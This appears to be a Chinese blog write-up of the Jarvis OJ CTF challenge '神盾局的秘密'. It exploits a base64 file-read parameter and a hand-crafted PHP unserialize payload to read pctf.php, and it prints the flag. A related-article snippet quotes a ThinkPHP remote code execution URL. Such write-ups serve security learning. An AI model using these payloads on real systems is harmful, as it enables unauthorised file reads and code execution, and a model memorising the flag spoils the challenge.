showimg.php,CTF-WEB-神盾局的秘密 #class#源文件读取#unserialize

最新推荐文章于 2024-03-22 19:52:34 发布
最新推荐文章于 2024-03-22 19:52:34 发布
阅读量484 收藏
点赞数
文章标签: showimg.php

神盾局的秘密—— PCTF{W3lcome_To_Shi3ld_secret_Ar3a}

描述

这里有个通向神盾局内部网络的秘密入口,你能通过漏洞发现神盾局的秘密吗?http://web.jarvisoj.com:32768/

分析

抓包发现: showimg.php?img=c2hpZWxkLmpwZw==,c2hpZWxkLmpwZw==为base64后的shield.jpg。

判断考点为读取源代码,试查看index.php内容,showimg.php?img=aW5kZXgucGhw。如果有传非空的class,则反序列化class值再用类里的方法readfile。

require_once('shield.php');

$x = new Shield();

#$x = class Shield{ $file = '';}

isset($_GET['class']) && $g = $_GET['class'];

#$g=O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}

if (!empty($g)) {

$x = unserialize($g);

#$x = class Shield{ $file = "pctf.php";}

}

echo $x->readfile();

#echo @file_get_contents("pctf.php");

?>

showimg.php?img=c2hpZWxkLmpwZw==

于是读取shield.php的内容:img=c2hpZWxkLnBocA==。存在一个构造函数和一个readfile(file值不为空且不含..|/|\时,读file值的文件内容)

//flag is in pctf.php

class Shield {

public $file;

function __construct($filename = '') {

#__construct():PHP 将所有以 __(两个下划线)开头的类方法保留为魔术方法,只有在对象创建时自动被调用

$this -> file = $filename;

}

function readfile() {

if (!empty($this->file) && stripos($this->file,'..')===FALSE

&& stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {

return @file_get_contents($this->file);}}}?>

读取pctf.php的内容:view-source:http://web.jarvisoj.com:32768/showimg.php?img=cGN0Zi5waHA=,提示file not found。在之前的源代码里都没看到这句,想来想去漏掉了showimg.php(一般来说最先看的是这个才对吧你毕竟在这里get来着(﹁"﹁)),于是看到果然有对img判断,不能有pctf。由于index.php里也可以readfile,转而投奔。具体的分析过程见最上面的注释。

$f = $_GET['img'];

if (!empty($f)) {

$f = base64_decode($f);

if (stripos($f,'..')===FALSE && stripos($f,'/')===FALSE && stripos($f,'\\')===FALSE

&& stripos($f,'pctf')===FALSE) {

readfile($f);

} else {

echo "File not found!";

}

}

?>

徒手写序列化:/index.php?class=O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}。目标是传入:class Shield{ $file = "pctf.php";}

然后出题在这个地方还要放坑……还好一直在view-source:下没有离开过。。。

//Ture Flag : PCTF{W3lcome_To_Shi3ld_secret_Ar3a}

//Fake flag:

echo "FLAG: PCTF{I_4m_not_fl4g}"

总结

1.学好php是多么的重要……

2.能读取文件的时候要把所有已知的都试试()

3.徒手写序列化还是蛮爽的()

格式:

对象类型:对象名长度:“对象名”:对象成员变量个数:{变量1类型:变量名1长度:变量名1; 参数1类型:参数1长度:参数1; 变量2类型:变量名2长度:“变量名2”; 参数2类型:参数2长度:参数2;… …}

对象类型:Class:用O表示,Array:用a表示。

变量和参数类型:string:用s表示,Int:用i表示,Array:用a表示。

序列符号:参数与变量之间用分号(;)隔开,同一变量和同一参数之间的数据用冒号(:)隔开。

例子一:

class Person{private $name = ‘Thinking’;private $sex = ‘man’;}

——serialize——>

O:6:”Person”:2:{s:12:” Person name”;s:8:”Thinking”;s:11:” Person sex”;s:3:”man”;}

例子二:

$Person = array(int(4),’sex’ => ‘man’);

——serialize——>

a:2:{i:4;s:3:”sex”;s:3:”man”;}

dashintolight
关注
google的一些秘密入口
小发猫
06-21 1万+
http://www.google.com/microsoft   微软风格的入口      http://www.google.com/mac   MAC风格的入口      http://www.google.com/linux   Linux风格的入口      http://www.google.com/bsd   FreeBSD风格的入口      Google有各种语言的版本,下面这些
vue自定义指令-加载指令v-loading和占位图指令v-showimg
老司机的后备箱
10-08 1878
bind(){}:每当指令绑定到元素上的时候,就会立刻执行bind这个函数。只调用一次。和css相关的操作,可以放在这个钩子函数中。inserted(){}:元素插入到DOM中的时候,会执行inserted函数。只调用一次。update(){}当数据跟新的时候,就会执行updated,可能会触发多次可以通过 bing.value(新值)!== bing.oldValue(旧值) 来判断跟新的时候做的处理。
浙大CTF web-神盾秘密
weixin_46578840的博客
09-13 421
打开题目地址,看到一张图片f12看到img后跟了一串base 解码得到shield.jpg,将后缀改为php编码成base访问得到一串代码 得到flag所在的pctf.php,直接访问出错,看到url里的showimg.php文件,想到将其编码base64,看一下源代码,发现img参数可以任意查看文件 上面提示的shield,已经看过了,这时候想到phpo的web一般都会有index.php,编码base64访问一下 看到包含了shield.php文件,那思路就来了,可以用index文件class传参p
Jarvis OJ web部分_神盾秘密
silence1_的博客
07-18 503
Jarvis OJ web部分_神盾秘密 题目链接:http://web.jarvisoj.com:32768/ 打开题目,F12,发现一个图片链接,showimg.php?img=c2hpZWxkLmpwZw== 于是去到这个页面,发现并不是一张图片,而是图片的文档打开形式。又注意到img=c2hpZWxkLmpwZw==这个应该是base64编码后的字符串,解码后为shield.jpg。...
CTF unserialize3
艺博东的博客
09-25 1万+
题目场景: http://220.249.52.133:52904 (温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、百度搜索:Thinkphp V5.x 远程代码执行漏洞-POC https://www.0dayhack.com/public/index.php?s=/index//think/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%2
CTFSHOW-反序列化
Yb_140的博客
04-06 3614
web254 直接构造 ?username=xxxxxx&password=xxxxxx web255 这关开始使用cookie进行反序列化 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; public function checkVip(){ return $this->
showImg(1).zip_读取照片
09-20
本文将详细介绍如何从Excel和Access中读取并显示这些嵌入的图片。 首先,我们要了解Excel中的图片读取。Excel文件(.xlsx)是基于Open XML标准的,它将所有内容包括图片存储为XML格式。要读取Excel中的图片,可以...
查看数据集的图片_showImg.zip
最新发布
09-16
查看数据集的图片_showImg
Simple Picasaweb Face-开源
05-09
标题“Simple Picasaweb Face-开源”指出,这是一个基于PHP的开源项目,旨在帮助用户在其个人网站上展示来自Picasaweb的相册和图片。Picasaweb是Google提供的一项服务,允许用户上传、管理和分享照片。由于这个项目...
DAlbum - personal PHP photo album-开源
04-24
4. reindex.php、showimg.php:这是两个PHP脚本,reindex.php可能是用于重新索引相册或更新数据的工具,而showimg.php则可能是处理图片显示的脚本,可能包含图片的缩放、旋转等操作。 总结来说,DAlbum是一个强大且...
跳转3秒后自动返回该页面
07-25
跳转3秒后自动返回该页面 点击提交 跳转到提示页面 3秒后自动返回提交页面。
最新地址发布页HTML源码-简洁好看的地址发布页
03-20
一个挺不错的HTML源码发布页,无后台,导入即可运用!!
deploy-k8s:在Rhel8上部署Kubernetes的角色
05-04
Ansible Roles在Redhat Linux 8上部署多主Kubernetes ========= Ansible角色集合,用于设置服务器和部署多主Kubernetes。 使用containerd.io 部署主人和工人。 通过用户提供的url /位置的yaml文件设置网络插件 加密的秘密 入口部署。 要求 带有RHEL 8+且已安装ansible的部署服务器,该用户具有ssh-key和ssh-key访问所有节点的权限和sudo访问权限(需要标记“ --become-user root --ask-become-pass”)或ssh直接在将要部署k8的位置上进行root操作。 准备工作 将存储库克隆到要用作堡垒/部署主机的计算机上。 cd deploy-k8s 在您要从中部署的服务器上安装kubectl,请阅读: ://kubernetes.io/docs/tasks/t
python emo_utils_emo(ji) 实现轻松将emoji插入到RMarkdown文档中
weixin_36330260的博客
02-19 2036
emo(ji)The goal of emo(ji) is to make it very easy to insert emoji into RMarkdown documents.InstallationYou can install emo from github with:# install.packages("devtools")devtools::install_github("had...
CTF攻防赛java反编译题
qq_40872999的博客
09-10 2246
CTF攻防赛java反编译题Reverse.class已知Reverse.class文件 Reverse.class 已知Reverse.class文件 打开方式:idea,eclipse等java工具,记事本打开乱码 // // Source code recreated from a .class file by IntelliJ IDEA // (powered by Fernflower ...
CTF题为例,浅学一些JAVAweb项目相关知识
Welcome To MakaRi's Blog!
03-22 1951
本文更加偏重于学习题目有关的JAVA知识,而非解题思路,题目的解题与本文讲到的知识点大多无关。但是通过题目学习这些知识可以帮助理解JAVA中web服务和数据库连接的实现,知道了JAVA如何启动服务以及如何连接数据库,这是以后进行JAVA安全学习的前提和基础。本人大一,比较菜且基础薄弱,如有错误还望大佬指点。
Google中各种有趣的入口
feverbit的专栏
04-27 1410
 http://www.google.com/microsoft微软风格的入口  http://www.google.com/macMAC风格的入口http://www.google.com/linuxLinux风格的入口http://www.google.com/bsdFreeBSD风格的入口Google有各种语言的版本,下面这些语言可能是在是稀罕了点儿http://www.google.com
隐私网址
热门推荐
weixin_44136690的博客
12-17 1万+
本软件尊重并保护所有使用服务用户的个人隐私权。为了给您提供更准确、更有个性化的服务,本软件会按照本隐私权政策的规定使用和披露您的个人信息。但本软件将以高度的勤勉、审慎义务对待这些信息。除本隐私权政策另有规定外,在未征得您事先许可的情况下,本软件不会将这些信息对外披露或向第三方提供。本软件会不时更新本隐私权政策。 您在同意本软件服务使用协议之时,即视为您已经同意本隐私权政策全部内容。本隐私权政策属于...
ctfphp反序列化,[世安杯]一道关于php反序列化漏洞的题目
weixin_36440198的博客
04-01 1037
Paste_Image.png没什么信息,因此ctrl+u查看源码:Paste_Image.png看到提示,file_get_contents()函数,联想到文件包含漏洞,因此google一波,查到Paste_Image.png查看原文因此试一试:Paste_Image.png补充一种饶过方法:由于本题:allow_url_include=On因此可以包含一个远程文件,假设你的云服务IP地址为:x...
使用jQuery和PHP实现图片上传与裁剪功能
Web开发中,有时我们需要提供用户上传并裁剪图片的功能。这个例子展示了如何结合jQuery和PHP来完成这一任务。首先,前端利用jQuery获取用户在预览图片时选择的裁剪参数,如宽高比和裁剪区域坐标,然后将这些信息...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值